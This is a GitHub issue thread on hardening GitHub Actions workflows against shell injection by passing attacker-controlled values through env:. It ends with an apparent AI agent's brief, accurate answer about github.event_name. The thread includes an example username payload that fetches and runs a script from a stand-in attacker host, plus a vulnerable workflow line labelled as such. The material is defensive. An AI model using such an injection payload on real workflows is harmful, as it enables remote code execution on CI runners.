Security: pass attacker-controllable GitHub context values through env: in workflows

[smolpaws]

Problem

GitHub Actions workflows that use ${{ }} expression interpolation directly inside run: shell blocks are vulnerable to shell injection when the interpolated value is attacker-controllable.

For example, a username like evil$(curl attacker.com/pwn|sh) would execute arbitrary code:

# ❌ VULNERABLE — attacker-controlled value expands in shell
run: echo "PR by ${{ github.event.pull_request.user.login }}"

Fix

Always pass attacker-influenced values through the env: block. The value arrives as a literal bash variable, not a shell expansion:

# ✅ SAFE — value flows through env, no shell expansion
env:
  PR_USER: ${{ github.event.pull_request.user.login }}
run: echo "PR by $PR_USER"

What to audit

Any ${{ }} expression inside a run: block that references attacker-controllable data:

Source	Examples
Usernames	github.event.pull_request.user.login, github.event.issue.user.login
PR/issue content	github.event.pull_request.title, github.event.pull_request.body, github.event.issue.title
Branch/tag names	github.event.pull_request.head.ref, github.ref_name
Commit messages	github.event.head_commit.message
Review comments	github.event.review.body, github.event.comment.body

Pattern to search for

# Find potentially vulnerable patterns in workflow files
grep -rn '\${{.*github\.event\.' .github/workflows/ | grep 'run:'

How to fix each occurrence

1. Move the ${{ }} expression from run: into an env: block on the same step
2. Reference it as $ENV_VAR in the shell instead
3. If the value is used in a step output (echo "name=value" >> $GITHUB_OUTPUT), the output itself becomes attacker-influenced — downstream steps consuming that output via ${{ steps.X.outputs.Y }} in their own run: blocks need the same env: treatment

References

• GitHub Security Lab: Script injection
• microsoft/agent-governance-toolkit — exemplary implementation of this pattern

[enyst]

@OpenHands please look at this across this repo and other public repos in the OpenHands org — specifically OpenHands/OpenHands, OpenHands/openhands-cli, OpenHands/agent-canvas, and OpenHands/benchmarks.

Audit all files for expressions inside blocks that reference attacker-controllable values (usernames, PR titles, branch names, commit messages, review comments). Fix by moving them through blocks as described in the issue.

[openhands-ai]

I'm on it! enyst can track my progress at all-hands.dev

[openhands-ai]

Since the last summary, I only answered your clarification question:

• github.event_name is GitHub-controlled and enum-like, not attacker-controlled in the same way as PR titles, branch names, usernames, comments, or commit messages.
• GitHub already exposes it in shell steps as $GITHUB_EVENT_NAME.
• Therefore, explicitly adding:

env:
  GITHUB_EVENT_NAME: ${{ github.event_name }}

is redundant for security purposes.

• The reason it was added was consistency from the broad hardening pass, but it is not required by the issue’s threat model.

No new code changes were made after the last work summary.